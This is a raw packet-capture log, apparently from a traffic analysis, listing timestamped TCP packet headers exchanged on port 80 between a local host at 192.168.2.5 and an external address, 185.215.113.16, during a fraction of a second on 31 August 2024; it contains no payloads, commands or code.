Aug 31, 2024 15:44:07.906267881 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.906279087 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.906289101 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.906299114 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.906311035 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.906318903 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.906331062 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.906369925 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.906387091 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.906399012 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.906405926 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.906418085 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.906430006 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.906435966 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.906441927 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.906461954 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.906498909 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.906533957 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.906543970 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.906555891 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.906574965 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.906608105 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.906636000 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.906646967 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.906652927 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.906658888 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.906713009 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.906714916 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.906725883 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.906754971 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.906780005 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.906898975 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.906909943 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.906920910 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.906954050 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.906955957 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.906965971 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.906976938 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.906977892 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.906991005 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.907002926 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.907002926 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.907018900 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.907049894 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.907486916 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.907548904 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.907553911 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.907567024 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.907578945 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.907592058 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.907596111 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.907603025 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.907613993 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.907634020 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.907658100 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.940583944 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.940594912 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.940604925 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.940717936 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.965967894 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.965985060 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.965996027 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.966005087 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.966016054 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.966027021 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.966136932 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.966137886 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.966147900 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.966157913 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.966169119 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.966177940 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.966187000 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.966209888 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.966223955 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.966397047 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.966407061 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.966415882 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.966427088 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.966444016 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.966444969 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.966454029 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.966464043 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.966474056 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.966475010 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.966490984 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.966491938 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.966501951 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.966511965 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.966512918 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.966521978 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.966535091 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.966563940 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.966617107 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.966628075 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.966638088 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.966646910 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.966659069 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.966662884 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.966686010 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.966697931 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.967328072 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.967344046 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.967354059 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.967376947 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.967396021 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.967396021 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.967406034 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.967416048 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.967426062 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.967436075 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.967463970 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.967577934 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.967587948 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.967597961 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.967623949 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.967637062 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.967660904 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.967672110 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.967680931 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.967691898 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.967703104 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.967713118 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.967741966 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.967772007 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.967782974 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.967792034 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.967802048 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.967813969 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.967820883 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.967824936 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.967845917 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.967866898 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.995655060 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.995711088 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.995721102 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.995732069 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.995877028 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.995879889 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.995891094 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.995906115 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.995915890 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.995929956 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.995935917 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.995948076 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.995955944 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.995958090 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.995968103 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.995976925 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.995980024 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.995990992 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.996010065 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.996042013 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.996059895 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.996069908 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.996079922 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.996088982 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.996097088 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.996098995 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.996109962 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.996140957 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.996157885 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.996220112 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.996229887 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.996238947 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.996249914 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.996258020 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.996262074 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.996273041 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.996283054 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.996287107 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.996293068 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.996304035 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.996313095 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.996314049 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.996336937 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.996359110 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.996459007 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.996468067 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.996478081 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.996504068 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.996521950 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.996524096 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.996531963 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.996541977 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.996551037 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.996570110 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.996603012 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.996629953 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.996640921 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.996654034 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.996675014 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.996680975 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.996691942 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.996691942 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.996701956 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.996711969 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.996717930 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.996722937 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.996738911 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.996767044 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.996799946 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.996841908 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.996850967 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.996861935 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.996900082 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.996925116 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.996934891 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.996944904 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.996957064 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.996968031 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.996985912 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.997008085 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.997095108 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.997106075 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.997114897 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.997126102 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.997137070 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.997139931 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.997148037 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.997158051 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.997165918 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.997168064 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.997178078 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.997189045 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:07.997189045 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.997209072 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:07.997229099 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.027247906 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.027260065 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.027270079 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.027434111 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.027445078 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.027455091 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.027465105 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.027477026 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.027487040 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.027493000 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.027515888 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.027537107 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.054631948 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.054642916 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.054666996 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.054677010 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.054687977 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.054699898 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.054706097 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.054714918 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.054776907 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.054827929 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.054840088 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.054851055 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.054860115 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.054871082 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.054882050 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.054882050 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.054898977 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.054900885 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.054923058 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.054940939 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.055108070 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.055159092 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.055187941 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.055197954 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.055207014 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.055238008 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.055263996 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.055504084 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.055519104 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.055529118 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.055561066 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.055576086 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.056408882 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.056420088 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.056431055 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.056487083 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.056502104 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.056854963 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.056865931 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.056876898 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.056885958 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.056899071 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.056906939 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.056906939 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.056930065 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.056948900 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.057296991 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.057307005 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.057316065 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.057327032 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.057337046 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.057348013 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.057348013 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.057358027 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.057368040 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.057368994 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.057384968 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.057394981 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.057396889 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.057404995 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.057410955 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.057440996 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.057466984 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.057476997 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.057487011 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.057496071 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.057514906 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.057543993 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.082475901 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.082495928 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.082508087 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.082519054 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.082530975 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.082550049 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.082559109 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.082575083 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.082583904 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.082592964 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.082604885 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.082607985 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.082614899 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.082626104 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.082649946 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.082662106 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.082670927 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.082673073 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.082703114 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.082719088 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.082724094 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.082730055 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.082741022 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.082751989 CEST	80	49714	185.215.113.16	192.168.2.5
Aug 31, 2024 15:44:08.082761049 CEST	49714	80	192.168.2.5	185.215.113.16
Aug 31, 2024 15:44:08.082788944 CEST	49714	80	192.168.2.5	185.215.113.16
